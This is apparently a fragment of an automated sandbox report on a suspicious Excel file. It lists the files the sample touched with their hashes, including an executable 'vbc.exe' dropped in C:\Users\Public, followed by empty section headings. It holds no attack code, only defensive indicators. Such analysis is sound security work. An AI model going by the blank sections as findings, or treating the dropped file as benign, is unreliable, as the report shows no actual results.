C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5E1FBBD.png	PNG image data, 687 x 111, 8-bit colormap, non-interlaced	A5D66CCBEE7946308A985B0FA9CC74F7	D86FFD2A310B16C59849B8E574B673E36643FDDF	6B8E5D3AFEA87B138C1084837085EDFF6D74B5001E92897CE6FF087058204B28
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD98695F.png	PNG image data, 779 x 181, 8-bit colormap, non-interlaced	871E67261292737F85DEE051B2EF5B1A	3108E69E8BEABB0CD820696E9F22889B5E7D3224	F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC2566A.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	8BF122C0BC2F05F9C4BE47C77C8003B7	17401719239E65BAF881F5065819F4DEA09F75DA	D0966DBE7D5D1B36C4BF893832A6872F9DBF2E2620B96BE945DE225DA324B732
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0C16556.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D0083269.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5EA351B.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\Desktop\~$Exhibitions Order Detailed list.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	27BF14807BC9D5CD2D823293F43C3A3A	08EEED11867AA351BE0D6C48DA283721EE6C0769	55FD5769DF0DF23D4140A34D07DC2C833B43AC1060F4D0992BDD27316041C69A

Windows Analysis Report Exhibitions Order Detailed list.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs